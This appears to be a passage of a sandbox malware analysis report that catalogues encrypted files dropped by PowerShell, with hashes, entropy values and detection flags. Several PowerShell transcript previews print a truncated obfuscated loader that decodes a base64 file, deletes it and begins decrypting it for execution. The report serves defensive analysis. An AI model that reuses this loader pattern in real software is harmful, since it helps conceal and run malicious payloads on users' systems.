                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):52536
                                                                                            Entropy (8bit):7.996154977184581
                                                                                            Encrypted:true
                                                                                            SSDEEP:768:tnt5h3+EgnBytr+be2LDUK5QgMa3jM51DXK/7rpvPJmc2an9meCltGnI2v/u4IuN:5tj3+v0oHDv5RM8mE7rpXJmltcvv/auN
                                                                                            MD5:C206D599CD40B2A56E4FD8A0A97E2C8A
                                                                                            SHA1:07A9F096EA4F80A566F16317BB012004818BBDBE
                                                                                            SHA-256:6BCA876CCD8844CFA673A8A7DD95F72878013B4037242457F507D5BAFF296F9D
                                                                                            SHA-512:D899732DF0B732C46A67D929AC870C87DAB9453B6F879E937D21EE4973D7B22F4C471DBDE14BDC2A3ADB029BF0E3EFE15A7EEBB838F1FE9DE3817FBD0E1C1172
                                                                                            Malicious:true
                                                                                            Preview: ..s....qy......aZn..@.6.<<..=...S.%z&=.w....;V.]e>O....<.....;..9)."..41.B..9... w.J-.|..iDm..n..c....~....@..(...%c5..@C..}..h(.L..N..Y.->#;..Ab.....(W.S.B..YJ\...N.........;.A...E$-...YYh...#.0.p.).....K.........u..0.I..U.W...Y..*..g....@.(..).G..Q..`f..(p.......m..e.n..6._.r....Y...H.lk.g.Ix.W.U.5b..).J).....%8.e.,....26r.B.R...........|R\s5Rhw...`...7c..*.~.7..........=........E..e@...c2.#0r@.9....1.......~o.....Hg.T..p.1Io.;..B.kp.%.%eG.>a...n.3.lRt_b..m'B..+.:....}y>.k.t....wf..=`..."X..5.....Y...5|..#.2u Q...D.U.~V.2...%./.....Fi...7`t.<|Q...)p.OJ.]7EWPN!e+.3B.......g..7..+....qJ+...t\.>.VJ.......x.F...I#s.......R.=M.X.d>l,p%.Y4..w......4Ad.5..5....[.#.`..N.A...4.;..#..X6h.. ....A..G..|Q....#....N..8.#u)..]...J*..9.NF.K..L..E..7.Z...;..@.....Y........f....nEn...+[..bh/..,CT.[$..'@PR4.}/........-..Id.m..#.5e..UFJ.Z.^"mb."3E{?..-.....NBVZv.b!.\j...69....J.*...7_"..........?.*......S....~.+vc8*...!I..0..k.H...]x.@.Y...'...R.^
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\wzZdaiABbDLUlNO.hqALkorUdFiNGXQYV
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):168793
                                                                                            Entropy (8bit):7.998937337298736
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:orvkpXsgoh4dJEtlRChLl8PZFVkl86waveacGUicvZucS7L5:EsqgGMEtlRChc48bha9Uicxud
                                                                                            MD5:C960F488DB98FB2B5BC12D70F973484A
                                                                                            SHA1:134C7F8F531147527CDAFEB55528F97459BD3091
                                                                                            SHA-256:6E0C8C6C17CF837662786186F523B5E3CDEED843206AB8BAD797B6EEE8DE8061
                                                                                            SHA-512:FE716BE0135EA1FC325C2743A768EAFA00B812EB3529457D786C1F8694F122A9E93F81A7D318A63FF10D2A2304DAE1CD691D21D37A51ADC62C3083579224A5E7
                                                                                            Malicious:true
                                                                                            Preview: ..s....d.m...8z65$...Z...C...L...."].J^...len.ty..4Q_.Y.a).9...!..3aW.Y.uN;8.pXP&......|3...$w"PK.}..".uZ.......X..~..7em.$.@^.,....=......^{F.A;...Bb.I.."..p.3....y.Kq.t....."t.L...W....U.Y+..2...*...T.U...Nw.....`..2....[..|u..].....g.W...>AD..F(...`L.G.L]......-j2f.33>y#....e?6L...Xh.>..S...J...'..I..U.).w.4.XmY!....J(....dC.2S.>.V..tr?%...[g..)..A&6.2.....E.3...VF.{b.$a.0............0..Y,.\.../.*..d.U.y"..)Y,.t..w....rh...|.K-....uJ...+0.U.>.....)=l..u1.?r...=-..,._5.G7%.E>.....dr.Z...m..5._.....m.@%....]..x."4CW.......r..t)..#M.e.............J.s .x.).lW.)...@.lq.{...f.P..%..s..^r....._...(]...W.......n 2.m~........`\R.m....{....L.x...0|..I....U.K1U..gk...,....9....!#>3Q....%........pQ.>...+.-.l...).....j...+8$"}G...P..f=t&...i.6........."!......9a6F..-Z....LD.p..X.i..Eh...$Q.....Ge..B.P.p'.9.`>.;5v.7.aq?<:q|....M.......O...\X.NZ..q..A....S@.w&.3.s...M6D...-..r0)...5.G9Q..=5E.T...$..X.&.Sj.6tF..-2>.H..9fGL.....K{}..Fo-...l.,.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\xBqjVEPYeTa.VjJmMgSUwYnd
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):107007
                                                                                            Entropy (8bit):7.99828242735117
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:NASFqr9ODhqcxS5OeenBbkpKfeWtko5aa0FCJUR+9TUE6n5SG0GT3DW/i:qp9OqcfeeBbqKfekko54QJpOEfa
                                                                                            MD5:4B0D8ADFF65CD853AF300ED0F886CF22
                                                                                            SHA1:6E8B9113158F74B300BFAA1DF9F62C6FF057E085
                                                                                            SHA-256:5337F981D6339252AFDA67C2D818BDE04E84FB1C1795E6A4D60E25B28C7D7DD3
                                                                                            SHA-512:DA24C93C9114510E0D1340578B855B3B731255CB7300A3B082ED6EF79F9F754EA3BC00BF97B5DD906E7282D68212159E295037292847E1691E34F47846348C31
                                                                                            Malicious:true
                                                                                            Preview: @_....y.........~3..X.Rs.1.......(../..6..3}..t.....Z...{~bp........4.O...<..I.M...[..\.`..{G.)?y<=.t)......z.....F....)5..8.g?.A[F...n^..B........a.%..?..}.C..8K....2..(B.....;..!R...f..gLn.....W...v... ._...W....1..8}.BdV....k...%....F.L*....p.....A....*.:.....X$l..'v...S.o.u..>.Y.........!...........,. ...).[...;...H.y.*.#.!q..S3 y..#.G..5n..L= E9,...jj...SH...Jg.M..%:2E'.A-..4.k.....j.:..[.....1..d..Y[u.(.......>..>...Q>.2...5.D..m.m5.1A'"...RyM)..Vz*..qC.sN.J........m..Wi..|gXp..d.C.R..J..@.......%...bH.\ck..q@Ff.ly.....o.)..CK..{...hf....o...]HQIK.I..BP9.f.&BX.<.."s[....8.g.T]....2..(^.,%\/.,[.i./...k.!g..d..$.N.9...[/....._.....*...:....v.Rn....0N.k{.B...['9..C...C.....-...h.pR..3.V....H.d.....p....1.H~M.F.........I.|...b>8..........m.b....Oy.j%/..A.L.z..@.'(...HJ..*!......{.c..0..<.=...L.X.,.0..).^.Z2Q..h..Gl9.a..D...8...t...M..?8ek.8...f......;k|..5....D...P.)]>"..P.}......1R.%mzx.5<..~F......H_.j+.A*.*.......D..........,]...w.A.6|.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\xnplLXbvwmcNAiIZ.LjIyFXNTqroGmkfAPih
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):151056
                                                                                            Entropy (8bit):7.998841894673308
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:vvSBaVqoruJ21e0Vd1hKAJTUUmh4WYJmPZ4WlcYBaNC6/K1Uiow4:0a5uJWbLJR2Z4M0iR4
                                                                                            MD5:C76339AD72B940BA8153C473D619F902
                                                                                            SHA1:A5D1B11133AB6B996D9C01B6913B9FBB4AF345DC
                                                                                            SHA-256:85695D16FD26E3DAC3DAAADA81F6837FAEED2C55FF599BDBB37BFFAAC7DD1579
                                                                                            SHA-512:20D4E2FF464BB1BC560C7CCCF03905B6B5B49E7ABE68432C3FD978624618C94E5C52C75F396593BD70460295B13023C92ABDF91ED33303694A5592931229B83C
                                                                                            Malicious:true
                                                                                            Preview: ;rQ.....M 7#eYw..kT......G.(Q1}.og....d84#..B%__.....7H.&../%......+.m....X..v.$.j.b7.......U.%^;O4.A...S.n'.p...+.....n..)..^..k:.j.aQ._.N..<w.).,.^..b...~7.NX5.&..J.!.h n....4....9....BpfQ.[rq3P._.......O..S../.....|.h....}.K.....D.x.:...OY...e...LA.R..~.....,c.....r.BD...>Z..T}~@.T.d...#..."...`.I.z..x...#.......3.%.x...}..H.I.y4..uWM.L .I...5..{w..D`.O..t.wmW+U.'m^...r.....m7...~}e..R.._.E.6P......C..i....O...h.K..V.[..C.<..._..8..;..!tI..J.<.\^.L.B.<.j_.,.M...f...p...Ia0.....\....6...{8....(...$.._.`......9...0.y.....MF....s.....y}._..S_.....,..`...1Wk.....!BW'..Q....2`m3AftY.;.`.s..".s...O>........F kJ.#)--...5..q/.!].|.......H........E..*...... .S..b.:....i...:.2...0...'Q.&....*2...GzL.$.E....Z..{...:..o...z.......K.j..K..W..L8.~Y7..|...>..X..T...A.1.n.1..M.B.n/.|...t.+,..........([...R.^h..O...M....mm.0}.F.#!..}.8*,..:.....z....#.=..oAo.VE.6Hg.S.!.r....~...7Q.......r..wS..iM.'I..TX.h...yd...Id.s.kd.c;k....{:..$...+.!....X_qI..\..JL
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\xoqRJdvTuIDia.kZDCejbWsJfd
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):93320
                                                                                            Entropy (8bit):7.997838353464406
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:R9p+DGT8M2poJhFVwdp30m//XFBz6qfIYle7coM6smEs2RB+NTKFUHmdNnwElT59:RD+6T8tpoJ/tm///z67mJKNW2HkGEl19
                                                                                            MD5:718480E96B6D0608ED346AAFAE97C2A3
                                                                                            SHA1:2CF944A4AF013E09E05B6107C8136B7352906432
                                                                                            SHA-256:FA68AF2AD26B39306B1E141C41A11DBDD94B8F56922BE1D7E79FAB52E2EA5617
                                                                                            SHA-512:B7A816F6DA298CD0E4482C7F9112EEEA8B0E056DDE28A144801B2200F10F5F6F6346EBE6AB17BCD57605C0B37C3341E779D446B6F815DB20F5B793EE8F9F1A88
                                                                                            Malicious:true
                                                                                            Preview: .......Ew_5...x.lvT.."..ET..X.6..3..o.-.....o..:.(Y....M.).....D.....B0.H'.......f=*..R.f$.T...(O..vh.,.%.0..~...T..L.A...:./#@..:.f....j.w~..$.f` ..P_....t.R.....).V..S.@d...3k....m... ..f.kk..(^........d.8.._.....R...5...|..&..5U.............0.b.L.r......?Kk..'..Z.".1.0fWN...K/.9J.......qoC.E....@..4Ab........rWD.}..E.>0."V....v.VE0..*1h..;}Sn....-......?+~...}.~-'.gRv.n...m...w.gH.[=T.......l...a...-....Q..ddr=g5."...ghq.......fRj2:...${X.^..z...7.q.!D.E...B.i.....,.mS.W.y..<.e..q..]H.uL...8....tr..&.z....v............Wm.....s+...zO..#....l......| .\..~..HJ.n...PX......O.H..j....O..K.^A.Op..Q...:j..."M.....i.....`...[.....M}...0F.:5.u.?s.Y+....../.5.....W.....9Q..V..Z.U.W..#].....,....M...y.....nAD.oL.....4a.7.f=......E....,YGIv...XLZ......q.n..[.u9.*...&......sk.T.`3...&.Km..Qj..ZQa.Htz.H>.S..B..^.g.,..<.w.Ocp,...P.F...!<{p.....Fs..]O..c....e..(k.....g...;.Ib.c:.L.}.x..Tf..I.k........{PU..6Nj.....xFb Z&...(.|...nW.f".w(_.:/.|........=.=..'.yuU..E
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\yjfLcAxmiM.OWifzdmXlYyKEDMI
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):69884
                                                                                            Entropy (8bit):7.99737951004056
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:JYHVGd7hKk3/y3nxZt1597Vs/S4729cZvxa5TRn/:JsVG5Yj5NVs/SKQWMH/
                                                                                            MD5:FFCF75487ECE00EB24627ECE78C2C582
                                                                                            SHA1:037F4E2D88C9812D67E087AF7AE8EF760A9D646F
                                                                                            SHA-256:0755EF3E8EA3D9DD70E77B07E43061D4FCDED4A9EF2439C3AA4F2D969BC34BB1
                                                                                            SHA-512:C2A2BD904693ADE8A02748DFB8B6ADA6A9CC87C1302281E6EA6A8404D41898CB76055138C316996D0C59BCCB3C973F150DF1F9B1D8218E4DAD9F1AAD40ABBB95
                                                                                            Malicious:true
                                                                                            Preview: .v...C. {...3..*..j...b..'@.rl.3...P.u1..=>.......:...|/I.#......N+-...-.].._N.HuEap13i.....Q.G.5+.....)o..k....9.......H|...@.4O...W7.%R.....evo...I....{/CT.8..1..)z......Tp.e-P5..12..........Y`3_.........P<.....N.z.J.w...<mG..Z.q...].D..aM.+...B..4..%.....|.U+..P.iS.h...{...w.R*%.Y....fG.!.hSU..U.z.{..v-......m.J..v.B'.T..v25B.+...D...|h.xa..!.....c..R.'.{..P......lB..U3...._.,...dPX..z.|m.....<...Q.iB...^.. ^#)...i..f}.t...."...].]!...Wvq[..v.2`.l...Z#.H......bk..a^P."....z.~...q..H.pxDD........9..I.w.i~yK..m..I....|...D....%.P.EI"......!...%."..X'..v.2#....^.Rt.rG.....;&..,.08A(.Z....X)8waS.{...S#~..N.......P.....,`...X.%O.%.........>..B.h&.5..UO...L.)u..1..sr[r...!..?.q.v...NT.2..6..R......g.,.6-.w.z.*.8....@c.<.-..g..E.K...y.......R.......r.E]V[.]/.4...`Ns..^....u...^....!#ko:l.z......._W.7.....c.....,O..$8.....G.........CR....M.....dL`G3.....Hv..~........,e.u.&H,.......v.2_|=;...K....{O4..O...|."...}.X....*.d..m_....IY..Wg....ID
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\zULyElrBPWfFTGqjKuR.LuHOZEIewPy
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):57272
                                                                                            Entropy (8bit):7.996620349119673
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:i4kAJApmVYRzl8S6xmwBl5/IBaneypqH2bWyAg1ka:ixAJIppcxdHm83NWy0a
                                                                                            MD5:C5DC0F2C4EF651D99F395DEAFA98EE58
                                                                                            SHA1:B8BE8EB36A64D84C1857890D47E72D99C182F644
                                                                                            SHA-256:86981880F5C59299E4AD2569CE37E3100B17AA286FFEF44A5CEC84B242E1A825
                                                                                            SHA-512:B6825B8392917A0CB844728F1E9FA794FFB8C13E397414D486DC9361E969AAF05C1C313109B332CAAB7A4F4CD3EC1A924F1AFA68CA308FAFD7C583FFF9D053EF
                                                                                            Malicious:true
                                                                                            Preview: ..F..S....u..7..C....Sx...E......poD.S.L[.J.&#.....).Zo.h....N.O.7i...y.6.-.Gz"...4..F..Dm....}..h.."&1.k...,c..!'..p..J.6..@I1..n6..t<.R.....).U.-.6]............^.zs.....iK...l.O..8.6.....\...fY.=ih.z.s..9G....G..........;~Bg...G~.^TX....W4..6.....Y...f.pa.4...Z.'8V.........'.h.....o.?...#......T..Z.E....:C.....U.d.0PIh3c.'.3....3l.n...s.V.s[N....=..O..Yd1.X..F.Z.V[U.l..U.-...$....^.N.l2.7-P.]H}.**,..K.,..sE....w......p.s....8L....]R..$......U..|HO..eQ..X-.O.b&..H.#$Q.e...w.i..h....4..Ni.::...=....W.j..doCd.d;A=r).z.c....+..L.bj..b......B].z....".....(..jb..#......,y...D $.l},..*.3...9..'..O.....s....4..{....5$}....x...oH+..d.v...O...1..5.H;{~.%..X..u....y..+G|\-x..l..o.E4.#.F....S:eJ..M..d..."..iM....o.m...Y.......j....A(@....0..L.....<.._?.....).[,..-PP.o|.....(.....>....q.....G...|....2f#\..p.2.....K..M........ zG+...{k.G|m9.^*..Od.F7 .\{M..w...i...W..^1......Pz>...O...TM....9.:....@...[.e'.o.i..m!.9t.ZVF.q*Z....../.{.....B.<
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.4ujEuSR7.20211211144038.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):18114
                                                                                            Entropy (8bit):5.595307227915985
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:fqu50ikqu50i+qu50i1h3mqu50iOtPitPUt4qu50iwwppUqu50ir9Ft9FtAFA:CZidZiTZiDZiO6cZiwwpptZif9WA
                                                                                            MD5:61A947E3DD391C88F2CB4F9CA7AC3C8C
                                                                                            SHA1:FDC61AC0EC4D3951867999ABA997714503CB51E5
                                                                                            SHA-256:6C9434DE257A5764E11E8D48D9B30BC53BDBD6A5DEEC9FE3BAD14EF8B2075D76
                                                                                            SHA-512:74EAF9DF26FE1FC7E3513DF65939F13857EEA3BABB4BA03B77DAE1CA326AFA56493F5241CDCE34343FF775211D81393EEC369BDECAA1E53114BF3B18DD8BB43F
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.4ujEuSR7.20211211144038.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144045..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.O+ospPLn.20211211144035.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):18114
                                                                                            Entropy (8bit):5.5953985718085715
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Squ50iUSqu50iAqu50iUuh3oqu50iUotPitPUthqu50iUbwpphqu50iUq9Ft9Ftf:/ZiU/ZiRZiUyZiUM6lZiUbwpp4ZiU09p
                                                                                            MD5:265713B5D2360A4D4C2CC042B1448295
                                                                                            SHA1:96882E17B169F42BE4BFB27EBAAA618C08E6F7BA
                                                                                            SHA-256:057D310DB4738E308072903720B71E18D30631CA6487CD336775C2008F26FABA
                                                                                            SHA-512:A64EB7A180F0DA77B9395F14CCC64BDFB9CA6191EC9903CC030AB4C5B58BCC16A55C2D367D5768D5D4C5D1ECF22944A02AB2576B5B9F3554CA1847509E788D72
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.O+ospPLn.20211211144035.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144053..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.SX01lhy_.20211211144040.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):18114
                                                                                            Entropy (8bit):5.595472921836246
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:fqu50ijBqu50i+qu50ijeh3Fqu50ijqtPitPUt+qu50ijwwpphqu50ijE9Ft9FtL:CZijYZiTZijnZiji62Zijwwpp4Zijq9V
                                                                                            MD5:E62E6B8AEF6F6C1B6EC084DA5F11657F
                                                                                            SHA1:1529CAA975584C33BA2A6684F214266B87C5FF0A
                                                                                            SHA-256:132FDE640380B51CD0D64F663B36B3EC6D5771D749472A65D31785ED6260BB51
                                                                                            SHA-512:8731FFCC45F421976309B513E72FFCE60F3A4599B7FD3DA785249434301038A006F4A52CA349912463DFA10E39C9B76A1E5DEBBAF178D64389188C6DE5F4A6B2
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.SX01lhy_.20211211144040.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144045..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.dw4EHDML.20211211144038.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):18114
                                                                                            Entropy (8bit):5.595518460460629
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Equ50ilqu50ihqu50ikh3Tqu50irtPitPUt7qu50i5wpphqu50i19Ft9FtAFU:9ZiUZi4Zi/ZiJ6TZi5wpp4ZiF9WU
                                                                                            MD5:A9D3FD6B18334DC95D4F564F271E4BF5
                                                                                            SHA1:5AC2477C678A299299B188489BD0CDBD98E1160B
                                                                                            SHA-256:E1D615710020D5AD94711DB277F16055FC357110A172627FCE9B018BE86242FF
                                                                                            SHA-512:D3CA84C9C38969DA0190E40F2975A65B35B053733C5D12EF90E834F656409043A37777B010DCB91F291561192797B8DBDC3499B3C583B22D11537FD8520FE7A9
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.dw4EHDML.20211211144038.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144042..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.q4FgjTZQ.20211211144035.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):3021
                                                                                            Entropy (8bit):5.549796812676628
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:BZPpvhOoO04Q/CZq2qWB3NXGQEXdfkWw1Vdd+UqDYB1Z9I4Q/CZq2qWB3NXGQEXr:BZdhON0XOqjWB5GQEXdfkW2VdAUqDo1Y
                                                                                            MD5:DE4293DC0F6AF346A752D4B326220638
                                                                                            SHA1:7A727C660C7B20594CBFCAEA50F7C927E03108AA
                                                                                            SHA-256:E9BEF26F6A59C818937BC1DA9B70D47BD47D96E09FD58D5B284F8F59B49ECB34
                                                                                            SHA-512:71616C6B5E756D86D1024574B9B51CE3DBE6A9DE73683A90796069B30DF910ABD705BFD14FA3B6557C4B59722CEF17F46384FAD0FCE2F6B442900E4C7F4C92AA
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.q4FgjTZQ.20211211144035.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144037..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.zcmp3+HP.20211211144037.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):18114
                                                                                            Entropy (8bit):5.595598859772949
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Wqu50irqu50ikqu50i8h34qu50iLtPitPUtbqu50iPwppZqu50iL9Ft9FtAFI:rZiWZidZiAZip6/ZiPwppQZi/9WI
                                                                                            MD5:8BE741D787B92D855A59AF9040336636
                                                                                            SHA1:26ED348E0F16246149D55315FA6A26623566C062
                                                                                            SHA-256:B3C660C6A4636B89F8E007E537757CF2A15888F9F7BFD6043DE7E3A3BAEE6AD0
                                                                                            SHA-512:24DB3AE98B7349D108349F5553A7171DF189276ACC70E2998F71A24B5B3C6B94988579AFF956B0410841CAF8F40F17D920A210475E29DB09A57ECCE7FA54E56A
                                                                                            Malicious:true
                                                                                            Yara Hits:
